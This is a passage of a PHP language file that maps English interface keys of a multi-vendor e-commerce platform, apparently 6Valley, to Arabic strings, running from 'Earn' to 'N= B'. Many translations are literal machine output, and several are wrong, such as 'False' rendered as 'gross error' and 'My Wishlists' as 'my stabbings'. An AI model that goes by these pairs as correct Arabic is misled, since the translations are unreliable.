'Earn_as_Delivery_Man' => 'كسب كرجل توصيل', 'Earn_money _o_your_wallet_by_completingthe_offer_&_challenged' => 'اربح المال يا محفظتك من خلال إكمال العرض والتحدي', 'Earn_money_to_your_wallet_by_completing_the_offer_&_challenged' => 'كسب المال لمحفظتك من خلال إكمال العرض والتحدي', 'Earning' => 'كسب', 'Earning Report' => 'تقرير كسب', 'Earning Statistics' => 'كسب الإحصاءات', 'Earning statistics for business analytics' => 'كسب إحصائيات لتحليلات الأعمال', 'Earning_From_Shipping' => 'كسب من الشحن', 'Earning_Report' => 'تقرير كسب', 'Earning_Reports' => 'كسب التقارير', 'Earning_Statistics' => 'كسب الإحصاءات', 'Earning_statistics' => 'كسب الإحصاءات', 'Easy Electronics' => 'إلكترونيات سهلة', 'Ecommerce' => 'التجارة الإلكترونية', 'Edit' => 'يحرر', 'Edit Bank Info' => 'تحرير معلومات البنك', 'Edit Modal Help Topic' => 'تحرير موضوع المساعدة الوسيطة', 'Edit Role' => 'تحرير الدور', 'Edit Shipping' => 'تحرير الشحن', 'Edit Shop Info' => 'تحرير معلومات المتجر', 'Edit_Bank_Info' => 'تحرير معلومات البنك', 'Edit_Bank_info' => 'تحرير معلومات البنك', 'Edit_My_Profile' => 'تعديل ملفي الشخصي', 'Edit_Personal_Details' => 'تحرير التفاصيل الشخصية', 'Edit_Profile' => 'تعديل الملف الشخصي', 'Edit_Shop_Info' => 'تحرير معلومات المتجر', 'Electron Pro' => 'إلكترون المحترفين', 'Electronic Agile' => 'رشيقة إلكترونية', 'Electronics' => 'الإلكترونيات', 'Email' => 'بريد إلكتروني', 'Email Verification' => 'تأكيد بواسطة البريد الالكتروني', 'Email_Verification' => 'تأكيد بواسطة البريد الالكتروني', 'Emergency_Contact' => 'الاتصال بالطوارىء', 'Employee' => 'موظف', 'Employee Add' => 'إضافة الموظف', 'Employee Edit' => 'تحرير الموظف', 'Employee List' => 'قائمة موظف', 'Employee Roles' => 'أدوار الموظف', 'Employee_Role_Setup' => 'إعداد دور الموظف', 'Employee_Section' => 'قسم الموظف', 'Employee_Update' => 'تحديث الموظف', 'Employees' => 'موظفين', 'Empty' => 'فارغ', 'Encryption' => 'التشفير', 'End Date' => 'تاريخ الانتهاء', 'End_Date' => 'تاريخ الانتهاء', 'Enjoy New experience' => 'استمتع بتجربة جديدة', 'Enjoy_New_experience' => 'استمتع بتجربة جديدة', 'Enter Social Media Link' => 'أدخل رابط وسائل التواصل الاجتماعي', 'Enter captcha value' => 'أدخل قيمة Captcha', 'Enter choice values' => 'أدخل قيم الاختيار', 'Enter currency Name' => 'أدخل اسم العملة', 'Enter currency code' => 'أدخل رمز العملة', 'Enter currency exchange rate' => 'أدخل سعر صرف العملة', 'Enter currency symbol' => 'أدخل رمز العملة', 'Enter new email address' => 'أدخل عنوان بريد إلكتروني جديد', 'Enter new password' => 'أدخل كلمة مرور جديدة', 'Enter recaptcha value' => 'أدخل قيمة recaptcha', 'Enter your email address' => 'أدخل عنوان بريدك الالكتروني', 'Enter_Attribute_Name' => 'أدخل اسم السمة', 'Enter_Your_City' => 'أدخل مدينتك', 'Enter_Your_zip_code' => 'أدخل رمزك البريدي', 'Enter_banner_sub_title' => 'أدخل العنوان الفرعي لافتة', 'Enter_banner_title' => 'أدخل لقب لافتة', 'Enter_button_text' => 'أدخل نص الزر', 'Enter_captcha_value' => 'أدخل قيمة Captcha', 'Enter_email' => 'أدخل البريد الإلكتروني', 'Enter_email_address_or_phone_number' => 'أدخل عنوان البريد الإلكتروني أو رقم الهاتف', 'Enter_email_number' => 'أدخل رقم البريد الإلكتروني', 'Enter_email_or_phone_number' => 'أدخل البريد الإلكتروني أو رقم الهاتف', 'Enter_password' => 'أدخل كلمة المرور', 'Enter_phone_number' => 'أدخل رقم الهاتف', 'Enter_url' => 'إدخال عنوان الموقع', 'Enter_your_email' => 'أدخل بريدك الإلكتروني', 'Enter_your_order_ID_& _phone_to_get_delivery_updates' => 'أدخل معرف الطلب والهاتف للحصول على تحديثات التسليم', 'Enter_your_order_ID_&_phone ' => 'أدخل معرف الطلب والهاتف الخاص بك', 'Enter_your_order_ID_&_phone_to_get_delivery_updates' => 'أدخل معرف الطلب والهاتف للحصول على تحديثات التسليم', 'Environment_Information' => 'معلومات البيئة', 'Environment_Setup' => 'إعداد البيئة', 'Eratmart' => 'إراتمارت', 'Error' => 'خطأ', 'Error Something went wrong' => 'خطأ حدث خطأ ما', 'Estimated Delivary Date' => 'تاريخ تسريح المقدر', 'Ex' => 'السابق', 'Ex = 017********' => 'على سبيل المثال=> 017 ********', 'Ex = DH-23434-LS' => 'على سبيل المثال=> DH-23434-LS', 'Ex = ex@example.com' => 'على سبيل المثال=> ex@example.com', 'Ex = password' => 'على سبيل المثال=> كلمة المرور', 'Ex= 01xxxxxxxxx' => 'على سبيل المثال=> 01xxxxxxxx', 'Ex= 10' => 'على سبيل المثال=> 10', 'Ex= 100' => 'على سبيل المثال=> 100', 'Ex= 1216' => 'على سبيل المثال=> 1216', 'Ex= 1234567890' => 'على سبيل المثال=> 1234567890', 'Ex= 32416436546' => 'على سبيل المثال=> 32416436546', 'Ex= 5' => 'على سبيل المثال=> 5', 'Ex= 500' => 'على سبيل المثال=> 500', 'Ex= 5000' => 'على سبيل المثال=> 5000', 'Ex= 6+ character' => 'على سبيل المثال=> 6+ حرف', 'Ex= 8+ Character' => 'على سبيل المثال=> 8+ حرف', 'Ex= 987652' => 'على سبيل المثال=> 987652', 'Ex= 9876543210' => 'على سبيل المثال=> 9876543210', 'Ex= Dhaka' => 'على سبيل المثال=> دكا', 'Ex= EID_Dhamaka' => 'على سبيل المثال=> عيد الدهاماكا', 'Ex= English' => 'على سبيل المثال=> اللغة الإنجليزية', 'Ex= F-12345678' => 'على سبيل المثال=> F-12345678', 'Ex= John Doe' => 'على سبيل المثال=> جون دو', 'Ex= Street 1 Street 2 Street 3 Street 4' => 'على سبيل المثال=> Street 1 Street 2 Street 3 Street 4', 'Ex= abcd1234efgh5678ijklmnop90qrstuvwxYZ' => 'EX=> ABCD1234EFGH5678IJKLMNOP90QRSTUVWXYZ', 'Ex= https= //play.google.com/store/apps' => 'على سبيل المثال=> https=>//play.google.com/store/apps', 'Ex= https= //www.apple.com/app-store/' => 'على سبيل المثال=> https=>//www.apple.com/app-store/', 'Ex= john@gmail.com' => 'على سبيل المثال=> john@gmail.com', 'Ex= my-awesome-app-12345' => 'على سبيل المثال=> My-Awesome-App-12345', 'Ex= my-awesome-app.appspot.com' => 'على سبيل المثال=> My-Awesome-app.appspot.com', 'Ex= my-awesome-app.firebaseapp.com' => 'على سبيل المثال=> My-Awesome-app.firebaseapp.com', 'Ex= _01XXXXXX' => 'على سبيل المثال=> 01xxxxxx', 'Ex= _01xxxxxxxxx' => 'على سبيل المثال=> 01xxxxxxxx', 'Ex= _1216_Dhaka' => 'على سبيل المثال=> 1216 دكا', 'Ex= _6+ character' => 'على سبيل المثال=> 6+ حرف', 'Ex= _6+_character' => 'على سبيل المثال=> 6+ حرف', 'Ex= _8+_character' => 'على سبيل المثال=> 8+ حرف', 'Ex= _Doe' => 'على سبيل المثال=> DOE', 'Ex= _Jhon_Doe' => 'على سبيل المثال=> Jhon Doe', 'Ex= _Jhone' => 'على سبيل المثال=> Jhone', 'Ex= _Riad_Uddin' => 'على سبيل المثال=> Riad Uddin', 'Ex_= _Shop_-12_Road-8' => 'على سبيل المثال=> Shop -12 Road -8', 'Ex_= _ex@example.com' => 'على سبيل المثال=> ex@example.com', 'Excel' => 'Excel', 'Excellent' => 'ممتاز', 'Exchange Rate' => 'سعر الصرف', 'Exclusive & Fashionable Suit For Men' => 'بدلة حصرية ومرضية للرجال', 'Expand Menu' => 'توسيع القائمة', 'Expand cart' => 'توسيع العربة', 'Expand menu' => 'توسيع القائمة', 'Expense Amount' => 'مبلغ المصاريف', 'Expense Type' => 'نوع المصاريف', 'Expense_Amount' => 'مبلغ المصاريف', 'Expense_Transaction_Statement' => 'بيان المعاملة النفقات', 'Expense_Transactions' => 'معاملات المصاريف', 'Expense_Type' => 'نوع المصاريف', 'Explore' => 'يستكشف', 'Explore_Now' => 'استكشف الآن', 'Export' => 'يصدّر', 'Extra_discount_can_not_be_more_than_100_percent' => 'لا يمكن أن يكون خصم إضافي أكثر من 100 في المائة', 'FAQ' => 'التعليمات', 'FAQ deleted successfully' => 'تم حذف الأسئلة الشائعة بنجاح', 'FAQs' => 'الأسئلة الشائعة', 'FCM Project ID' => 'معرف مشروع FCM', 'FCM Settings' => 'إعدادات FCM', 'FCM_Project_ID' => 'معرف مشروع FCM', 'FCM_Settings' => 'إعدادات FCM', 'FREE' => 'حر', 'Facebook' => 'فيسبوك', 'Facebook API Set up Instructions' => 'Facebook API إعداد التعليمات', 'Facebook Login' => 'تسجيل الدخول الى الفيسبوك', 'Failed' => 'فشل', 'Failed To Deliver' => 'فشل في التسليم', 'Failed_To_Delivery' => 'فشل التسليم', 'Failed_to_Deliver' => 'فشل في التسليم', 'Failed_to_deliver' => 'فشل في التسليم', 'False' => 'خطأ شنيع', 'Fast Delivery all accross the country' => 'تسليم سريع كل ما يتراكم في البلاد', 'Feature Deal' => 'ميزة الصفقة', 'Feature Deal Update' => 'ميزة تحديث الصفقة', 'Featured' => 'متميز', 'Featured status updated successfully' => 'تم تحديث الحالة المميزة بنجاح', 'Featured_Deal' => 'صفقة مميزة', 'Featured_Deals' => 'عروض مميزة', 'Featured_Products' => 'منتجات مميزة', 'Fee' => 'مصاريف', 'Feedback' => 'تعليق', 'File' => 'ملف', 'File size too big' => 'حجم الملف كبير جدا', 'File type= jpg jpeg png gif zip pdf' => 'نوع الملف=> JPG JPEG PNG GIF ZIP PDF', 'File type= jpg jpeg png. Maximum size= 2MB' => 'نوع الملف=> JPG JPEG PNG. الحد الأقصى للحجم=> 2 ميغابايت', 'File_type= _jpg_jpeg_png._Maximum_size' => 'نوع الملف=> JPG JPEG PNG. أكبر مقاس', 'File_type= _jpg_jpeg_png._Maximum_size= _2MB' => 'نوع الملف=> JPG JPEG PNG. الحد الأقصى للحجم=> 2 ميغابايت', 'Fill in your email address below' => 'ملء في عنوان البريد الالكتروني أدناه', 'Fill the form and press' => 'املأ النموذج واضغط', 'Fill_all_required_fields_of_billing_address' => 'املأ جميع الحقول المطلوبة لعنوان الفواتير', 'Fill_all_required_fields_of_shipping/billing_address' => 'املأ جميع الحقول المطلوبة للشحن/عنوان الفواتير', 'Fill_all_required_fields_of_shipping_address' => 'املأ جميع حقول الشحن المطلوبة', 'Filter' => 'منقي', 'Filter_Data' => 'تصفية البيانات', 'Filter_Report' => 'تقرير المرشح', 'Final_Total' => 'المجموع النهائي', 'Find' => 'يجد', 'Find_What_You_Need' => 'ابحث عن ما تحتاجه', 'Find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'ابحث عن المنتجات وتحديدها لمعرفة الاختلافات والتشابه بينهما', 'Find_us' => 'تجدنا', 'Firebase Configuration' => 'تكوين Firebase', 'Firebase Push Notification Setup' => 'إعداد إشعار Pirebase Push', 'First' => 'أولاً', 'First name is required!' => 'الإسم الأول مطلوب!', 'First step' => 'الخطوة الأولى', 'First_Name' => 'الاسم الأول', 'First_Order' => 'الطلب الأول', 'First_Shipping' => 'الشحن الأول', 'First_Shipping_all_accross_the_country' => 'أول شحن كل تراكم البلاد', 'First_Shipping_all_across_the_country' => 'الشحن الأول في جميع أنحاء البلاد', 'Flash Deal' => 'صفقة فلاش', 'Flash Deal Products' => 'Flash Deal Products', 'Flash Deal Update' => 'تحديث صفقة فلاش', 'Flash Deals' => 'عروض فلاش', 'Flash Sale for Any Item' => 'بيع فلاش لأي عنصر', 'Flash_Deal' => 'صفقة فلاش', 'Flash_Deals' => 'عروض فلاش', 'Flat' => 'مستوي', 'Follow' => 'يتبع', 'Follow the documentation to setup from app end' => 'اتبع الوثائق اللازمة لإعداد من نهاية التطبيق', 'Follow_Complete' => 'اتبع كاملة', 'Followers' => 'متابعون', 'Footer Banner' => 'لافتة تذييل', 'Footer_Banner' => 'لافتة تذييل', 'For mobile app only' => 'لتطبيق الهاتف المحمول فقط', 'For multi vendor operation' => 'لعملية بائع متعددة', 'For single vendor operation' => 'لعملية بائع واحد', 'For single vendor operation deactive all seller!!' => 'لعملية بائع واحد إلغاء إلغاء البائع !!', 'For single vendor operation please deactive all seller product' => 'لعملية بائع واحد ، يرجى إلغاء إلغاء إلهي جميع منتجات البائع', 'Forget Password' => 'ننسى كلمة المرور', 'Forgot Password' => 'هل نسيت كلمة السر', 'Forgot your password' => 'نسيت كلمة السر', 'Forgot_Password' => 'هل نسيت كلمة السر', 'Fourth step' => 'الخطوة الرابعة', 'Framerce' => 'الإطارات', 'Free Delivery' => 'توصيل مجاني', 'Free_Delivery' => 'توصيل مجاني', 'Free_Delivery_Amount' => 'مبلغ التوصيل المجاني', 'Free_Delivery_Coupon' => 'قسيمة توصيل مجانية', 'Free_Delivery_on_Coupon_Discount' => 'توصيل مجاني على خصم القسيمة', 'Free_Shipping' => 'ًالشحن مجانا', 'Free_Shipping_on_all_Order_Above_$560' => 'شحن مجاني على كل الطلبات فوق 560 دولار', 'Fresh_Product' => 'منتج جديد', 'From' => 'من', 'From About You tab press' => 'من TAB TAB PRESS', 'From Contact Info tab provide' => 'من علامة تبويب معلومات الاتصال', 'From Register tab press' => 'من علامة التبويب التسجيل اضغط', 'From Verify Account tab' => 'من علامة التبويب التحقق من الحساب', 'Full' => 'ممتلىء', 'Full Name' => 'الاسم الكامل', 'GST' => 'ضريبة السلع والخدمات', 'GST Number' => 'رقم ضريبة السلع والخدمات', 'GST_Number' => 'رقم ضريبة السلع والخدمات', 'Gadgets' => 'الأدوات', 'Gamming Laptop' => 'جهاز كمبيوتر محمول', 'General Info' => 'معلومات عامة', 'General_Info' => 'معلومات عامة', 'General_Information' => 'معلومات عامة', 'General_info' => 'معلومات عامة', 'Generate Sitemap' => 'توليد خريطة sitemap', 'Generate_Site_Map' => 'إنشاء خريطة الموقع', 'Generate_Sitemap' => 'توليد خريطة sitemap', 'Geothermal Air Conditioner' => 'مكيف الهواء الحراري الأرضي', 'Get Started' => 'البدء', 'Get new password' => 'احصل على كلمة سر جديدة', 'Gil Watkins' => 'جيل واتكينز', 'Go Back' => 'عُد', 'Go to' => 'اذهب إلى', 'Go to Apple Developer page' => 'انتقل إلى صفحة مطور Apple', 'Go to the Credentials page' => 'انتقل إلى صفحة بيانات الاعتماد', 'Go to the facebook developer page' => 'انتقل إلى صفحة مطور Facebook', 'Go to the facebook developer page and' => 'انتقل إلى صفحة مطور Facebook و', 'Go to your order' => 'انتقل إلى طلبك', 'Go_Back' => 'عُد', 'Go_To_Chatbox' => 'انتقل إلى chatbox', 'Go_back' => 'عُد', 'Go_to_the_Credentials_page' => 'انتقل إلى صفحة بيانات الاعتماد', 'Good' => 'جيد', 'Google API Set up Instructions' => 'جوجل API إعداد التعليمات', 'Google plus' => 'جوجل بلس', 'Google_Map_APIs' => 'واجهات برمجة تطبيقات خريطة Google', 'Google_Recapcha_Information' => 'google recapcha معلومات', 'Got It' => 'فهمتها', 'Got_It' => 'فهمتها', 'Great Hall' => 'قاعة كبيرة', 'Grid_View' => 'عرض شبكي', 'HI' => 'أهلاً', 'HMAC' => 'HMAC', 'HOME' => 'بيت', 'Happy_Club' => 'نادي سعيد', 'Hard disk' => 'القرص الصلب', 'Have_an_Account' => 'لديك حساب', 'Head Office' => 'المكتب الرئيسي', 'Header Banner' => 'لافتة الرأس', 'Headphones' => 'سماعات الرأس', 'Hello' => 'مرحبًا', 'Hello Store' => 'مرحبا متجر', 'Help & Support' => 'ساعد لدعم', 'Help_&_Support' => 'ساعد لدعم', 'Help_&_Support_Section' => 'قسم المساعدة والدعم', 'Here in top left corner you can see the' => 'هنا في أعلى الزاوية اليسرى يمكنك رؤية', 'High' => 'عالي', 'High_to_Low' => 'عالية إلى منخفض', 'High_to_Low_Price' => 'ارتفاع السعر إلى انخفاض', 'Holder Name' => 'اسم حامل', 'Holder_Name' => 'اسم حامل', 'Home' => 'بيت', 'Home Pet & Appliances' => 'منزل الحيوانات الأليفة والأجهزة', 'Home Improvement & Tools' => 'تحسين المنزل والأدوات', 'Home_(Shipping_Address)' => 'الصفحة الرئيسية (عنوان الشحن)', 'Host' => 'يستضيف', 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li' => 'أحذية رياضية مبيع ساخنة للرجال أحذية غير رسمية للرجال أحذية رياضية', 'Hotline' => 'الخط الساخن', 'How_the_Setting_Works' => 'كيف يعمل الإعداد', 'How_to_use' => 'كيف تستعمل', 'Hurry_up' => 'أسرع - بسرعة', 'ID' => 'بطاقة تعريف', 'I_agree_with_the' => 'أتفق مع', 'Id' => 'بطاقة تعريف', 'If GST number is disabled here it will not show in invoice' => 'إذا تم تعطيل رقم ضريبة السلع والخدمات هنا ، فلن يظهر في الفاتورة', 'If needed' => 'إذا لزم الأمر', 'If sales commission is disabled here the system default commission will be applied' => 'إذا تم تعطيل لجنة المبيعات هنا ، فسيتم تطبيق اللجنة الافتراضية للنظام', 'If the user fails to get the OTP within a certain time user can request a resend' => 'إذا فشل المستخدم في الحصول على OTP خلال فترة زمنية معينة ، يمكن للمستخدم طلب إعادة الالتزام', 'If you need help or you have any other questions feel free to email us' => 'إذا كنت بحاجة إلى مساعدة أو لديك أي أسئلة أخرى ، فلا تتردد في مراسلتنا عبر البريد الإلكتروني', 'If_disabled_admin_can_deliver_orders_only_within_his_country' => 'إذا كان بإمكان المسؤول المعاق تقديم أوامر فقط داخل بلاده', 'If_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'إذا لم يتمكن البائعون المعاقون من بيع المنتجات الرقمية في متاجرهم', 'If_enabled_admin_can_deliver_orders_beyond_his_country' => 'إذا تمكن المسؤول الممكّن من تقديم أوامر خارج بلاده', 'If_enabled_sellers_can_sell_digital_products_in_their_shops' => 'إذا تمكن البائعون الممكّنون من بيع المنتجات الرقمية في متاجرهم', 'If_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site _you' => 'إذا كنت بحاجة إلى أي مساعدة أو لديك ملاحظات أو اقتراحات حول موقعنا أنت', 'Image' => 'صورة', 'Image ratio should be' => 'يجب أن تكون نسبة الصورة', 'Image ratio should be 1= 1' => 'يجب أن تكون نسبة الصورة 1=> 1', 'Image uploaded successfully' => 'تم تحميل الصورة بنجاح', 'Image_Ratio' => 'نسبة الصورة', 'Image_Ration' => 'حصص الصورة', 'Image_Ration_1= 1' => 'حصص الصورة 1=> 1', 'Image_format_-_jpg _jpeg _png' => 'تنسيق الصورة - JPG JPEG PNG', 'Image_ratio_should_be' => 'يجب أن تكون نسبة الصورة', 'Image_size_must_be_within' => 'يجب أن يكون حجم الصورة داخل', 'Image_type_must_be_within' => 'يجب أن يكون نوع الصورة داخل', 'Import Products File' => 'استيراد ملف المنتجات', 'In about section select' => 'في القسم حول SELECT', 'In-Active' => 'غير نشط', 'In-House' => 'في بيت', 'In-House Earning' => 'كسب في المنزل', 'In-House Orders' => 'أوامر داخلية', 'In-House Product Discount' => 'خصم المنتج في المنزل', 'In-House Products' => 'المنتجات الداخلية', 'In-House_Order' => 'ترتيب داخلي', 'In-House_Product_List' => 'قائمة المنتج في المنزل', 'In-House_Shop' => 'متجر في المنزل', 'In-House_Store_Banner' => 'لافتة المتجر في المنزل', 'In-House_earning' => 'كسب في المنزل', 'In-Stock' => 'في الأوراق المالية', 'In-house' => 'في بيت', 'InHouse Products' => 'منتجات Inhouse', 'InHouse product sale report' => 'تقرير بيع المنتج Inhouse', 'In_Compare' => 'بالمقارنة', 'In_House' => 'في بيت', 'In_Stock' => 'في الأوراق المالية', 'Inactive' => 'غير نشط', 'Inactive_Products' => 'منتجات غير نشطة', 'Inbox' => 'صندوق الوارد', 'Incomplete bank info' => 'معلومات بنكية غير مكتملة', 'Infinity' => 'ما لا نهاية', 'Info' => 'معلومات', 'Info inquiry' => 'استفسار المعلومات', 'Info updated successfully!' => 'معلومات تم تحديثها بنجاح!', 'Info_inquiry' => 'استفسار المعلومات', 'Informations' => 'معلومة', 'Inhouse product sale Report' => 'تقرير بيع المنتج Inhouse', 'Input Field Type' => 'نوع حقل الإدخال', 'Instagram' => 'Instagram', 'Instruction will be available very soon' => 'ستكون التعليمات متاحة قريبًا جدًا', 'Instructions' => 'تعليمات', 'Internet Cable' => 'كابل الإنترنت', 'Invalid Order Id or Phone Number' => 'معرف طلب غير صالح أو رقم هاتف', 'Invalid Phone Number' => 'رقم الهاتف غير صحيح', 'Invalid credential or account no verified yet' => 'بيانات اعتماد غير صالحة أو حساب لم يتم التحقق منه بعد', 'Invalid credential or account suspended' => 'تم تعليق بيانات الاعتماد غير صالحة أو حساب', 'Invalid date range' => 'نطاق تاريخ غير صالح', 'Invalid review!' => 'مراجعة غير صالحة!', 'Invalid withdraw request' => 'طلب سحب غير صالح', 'Invoice' => 'فاتورة', 'Is Required' => 'مطلوب', 'Item' => 'غرض', 'Item Details' => 'تفاصيل العنصر', 'Item has been added in your cart!' => 'تمت إضافة العنصر في عربة التسوق الخاصة بك!', 'Item has been removed from cart' => 'تمت إزالة العنصر من العربة', 'Item has been removed from cart ' => 'تمت إزالة العنصر من العربة', 'Item_Details' => 'تفاصيل العنصر', 'Item_Price' => 'سعر البند', 'Item_has_been_removed_from_cart' => 'تمت إزالة العنصر من العربة', 'Item_has_been_removed_from_cart ' => 'تمت إزالة العنصر من العربة', 'Items' => 'أغراض', 'Items Ordered' => 'العناصر المطلوبة', 'Items Price' => 'سعر العناصر', 'Jewelry' => 'مجوهرات', 'Jewelry & Watches' => 'المجوهرات والساعات', 'Jhon' => 'جون', 'Joined' => 'انضم', 'Joined At' => 'انضم في', 'Just_reorder_from_your_previous_orders' => 'فقط أعد ترتيب من أوامرك السابقة', 'Just_reorder_from_your_previous_orders.' => 'فقط أعد ترتيب من أوامرك السابقة.', 'KR Fashion' => 'أزياء KR', 'Kevin Barr' => 'كيفن بار', 'Key' => 'مفتاح', 'Key removed successfully' => 'إزالته بنجاح', 'Key translated successfully' => 'مفتاح ترجمة بنجاح', 'Keyboard & Mouse' => 'فأرة لوحة المفاتيح', 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs' => 'طاولة خشبية الأطفال و 4 كرسي طاولة طبيعية كراسي متنوعة الألوان', 'LTR' => 'LTR', 'LUX' => 'لوكس', 'Ladies Bag' => 'حقيبة السيدات', 'Ladies Watch' => 'مشاهدة السيدات', 'Ladies Winter Long Sleeve Sweater' => 'سترة الأكمام الطويلة الشتاء للسيدات', 'Language' => 'لغة', 'Language Translate' => 'ترجمة اللغة', 'Languages' => 'اللغات', 'Laptop Tabs & Notebooks' => 'علامات تبويب الكمبيوتر المحمول وأجهزة الكمبيوتر المحمولة', 'Laptop cooler' => 'مبرد الكمبيوتر المحمول', 'Last' => 'آخر', 'Last Name' => 'اسم العائلة', 'Last Updated' => 'آخر تحديث', 'Last Updated Stock' => 'آخر سهم محدث', 'Last name is required!' => 'إسم العائلة مطلوب!', 'Last_Name' => 'اسم العائلة', 'Latest' => 'أحدث', 'Latest_Product' => 'أحدث المنتجات', 'Latest_Products' => 'أحدث المنتجات', 'Leave a Message' => 'ترك رسالة', 'Leave_a_comment' => 'اترك تعليقا', 'Leave_your_issue' => 'اترك مشكلتك', 'Left' => 'غادر', 'Let_us_Shopping_Today' => 'دعونا نتسوق اليوم', 'Letâs_Shopping_Today' => 'دعنا نتسوق اليوم', 'Limit' => 'حد', 'Limited Sotcks' => 'محدودة sotcks', 'Limited_Stocked_Products_List' => 'قائمة المنتجات المحدودة المخزنة', 'Limited_Stocks' => 'الأسهم المحدودة', 'LinkedIn' => 'LinkedIn', 'List' => 'قائمة', 'List_View' => 'عرض القائمة', 'Live' => 'يعيش', 'Live_Chat' => 'دردشة مباشرة', 'Loading Gif' => 'تحميل GIF', 'Log in into your Facebook account (if youâre not)' => 'قم بتسجيل الدخول إلى حسابك على Facebook (إذا لم تكن كذلك)', 'Login' => 'تسجيل الدخول', 'Login Turned OFF ' => 'إيقاف تشغيل تسجيل الدخول', 'Login Turned ON ' => 'تم تشغيل تسجيل الدخول', 'Login is now disabled. Customers will not be able to sign up or log in using their social media accounts. Please note that this may affect user experience and registration/login process.' => 'تم تعطيل تسجيل الدخول الآن. لن يتمكن العملاء من التسجيل أو تسجيل الدخول باستخدام حسابات وسائل التواصل الاجتماعي الخاصة بهم. يرجى ملاحظة أن هذا قد يؤثر على تجربة المستخدم وعملية التسجيل/تسجيل الدخول.', 'Login is now enabled. Customers will be able to sign up or log in using their social media accounts.' => 'تم الآن تمكين تسجيل الدخول. سيتمكن العملاء من التسجيل أو تسجيل الدخول باستخدام حسابات وسائل التواصل الاجتماعي الخاصة بهم.', 'Login_Now' => 'تسجيل الدخول الآن', 'Login_successful' => 'تسجيل الدخول ناجح', 'Logout' => 'تسجيل خروج', 'London Beauty Soap Bar' => 'بار صابون الجمال في لندن', 'Low' => 'قليل', 'Low_to_High' => 'من أسفل إلى أعلى', 'Low_to_High_Price' => 'انخفاض السعر إلى ارتفاع', 'Loyalty Point' => 'نقطة الولاء', 'Loyalty_Point' => 'نقطة الولاء', 'Loyalty_Points' => 'نقاط الولاء', 'Mail Config' => 'تكوين البريد', 'Mail_Body' => 'جسم البريد', 'Mail_Config' => 'تكوين البريد', 'Main Banner' => 'لافتة رئيسية', 'Main Section Banner' => 'لافتة القسم الرئيسي', 'Main_Banner' => 'لافتة رئيسية', 'Main_Banner_updated_Successfully' => 'تم تحديث اللافتة الرئيسية بنجاح', 'Maintenance Mode on' => 'وضع الصيانة على', 'Maintenance_Mode' => 'نمط الصيانة', 'Make sure to check' => 'تأكد من التحقق', 'Man Watch' => 'مشاهدة الرجل', 'Manage_Deliveries' => 'إدارة عمليات التسليم', 'Marketing_Section' => 'قسم التسويق', 'Mart Morning' => 'Mart Morning', 'Max' => 'الأعلى', 'Mechanical' => 'ميكانيكي', 'Medium' => 'واسطة', 'Men s fashion' => 'أزياء الرجال', 'Menu' => 'قائمة طعام', 'Merchant' => 'تاجر', 'Message' => 'رسالة', 'Message_Log' => 'سجل الرسائل', 'Message_View' => 'عرض الرسالة', 'Message_updated' => 'تحديث الرسالة', 'Messages' => 'رسائل', 'Meta Description' => 'ميتا الوصف', 'Meta Image' => 'صورة التعريف', 'Meta Title' => 'عنوان الفوقية', 'Meta_Description' => 'ميتا الوصف', 'Meta_Image' => 'صورة التعريف', 'Meta_Title' => 'عنوان الفوقية', 'Meta_description' => 'ميتا الوصف', 'Meta_image' => 'صورة التعريف', 'Meta_title' => 'عنوان الفوقية', 'Method' => 'طريقة', 'Method_name' => 'اسم الطريقة', 'Microphones' => 'الميكروفونات', 'Microwaves' => 'الموجات الصغرية', 'Min' => 'دقيقة', 'Minimum' => 'الحد الأدنى', 'Minimum_' => 'الحد الأدنى', 'Minimum_200_Points_required_to_convert_Into_currency' => 'ما لا يقل عن 200 نقطة مطلوبة للتحويل إلى عملة', 'Minimum_200_points_required_to_convert' => 'ما لا يقل عن 200 نقطة مطلوبة للتحويل', 'Mobile' => 'متحرك', 'Mobile Accessories' => 'اكسسوارات المحمول', 'Modentum' => 'في الاعتدال', 'More From The Store' => 'المزيد من المتجر', 'More_Brands' => 'المزيد من العلامات التجارية', 'More_Categories' => 'المزيد من الفئات', 'More_from_the_Store' => 'المزيد من المتجر', 'Morning Mart' => 'Morning Mart', 'Most_Demanded_Product' => 'معظم المنتجات المطلوبة', 'Most_Favorite' => 'اكثر تفضيلا', 'Most_Loved' => 'الأكثر أحببًا', 'Most_Popular_Stores' => 'المتاجر الأكثر شعبية', 'Most_Searching' => 'معظم البحث', 'Most_Visited_Categories' => 'معظم الفئات زيارة', 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).' => 'تعتمد العملة المتعددة على سعر الصرف وتكوين البوابة الخاص بك ، لذا إذا كنت لا تحتاج إلى تعدد العملة ، فسيكون من الأفضل تحديد عملة واحدة. (نفضل استخدام عملة واحدة).', 'My Address' => 'عنواني', 'My Loyalty Point' => 'نقطة ولائتي', 'My Order' => 'طلبي', 'My Order List' => 'قائمة طلبي', 'My Shopping Cart' => 'سلة التسوق الخاصة بي', 'My Support Tickets' => 'تذاكر الدعم الخاصة بي', 'My Wallet' => 'محفظتى', 'My Wishlists' => 'طعناتي', 'My profile' => 'ملفي', 'My_Address' => 'عنواني', 'My_Addresses' => 'عناويني', 'My_Bank_Info' => 'معلومات البنوك الخاصة بي', 'My_Compare_List' => 'قائمة المقارنة الخاصة بي', 'My_Compare_list' => 'قائمة المقارنة الخاصة بي', 'My_Inbox' => 'صندوق البريد الخاص بي', 'My_Loyalty_Point' => 'نقطة ولائتي', 'My_Order' => 'طلبي', 'My_Order_Details' => 'تفاصيل طلبي', 'My_Order_Details_Delivery_Man_Info' => 'تفاصيل طلبي تسليم معلومات رجل', 'My_Order_Details_Seller_Info' => 'تفاصيل طلبي معلومات البائع', 'My_Order_Details_Track_Order' => 'طلب تفاصيل طلبي', 'My_Order_List' => 'قائمة طلبي', 'My_Profile' => 'ملفي', 'My_Shop' => 'متجري', 'My_Shopping_Cart' => 'سلة التسوق الخاصة بي', 'My_Support_Tickets' => 'تذاكر الدعم الخاصة بي', 'My_Wallet' => 'محفظتى', 'My_Wish_List' => 'قائمة امنياتي', 'My_Wishlist' => 'قائمة امنياتي', 'My_Wishlists' => 'طعبي أمنياتي', 'My_profile' => 'ملفي', 'N/a' => 'ن/أ', 'N= B you_can_upload_only' => 'N=> ب يمكنك تحميل فقط', 'N= B you_can_upload_only_6Valleyâs_theme_templates' => 'N=> B 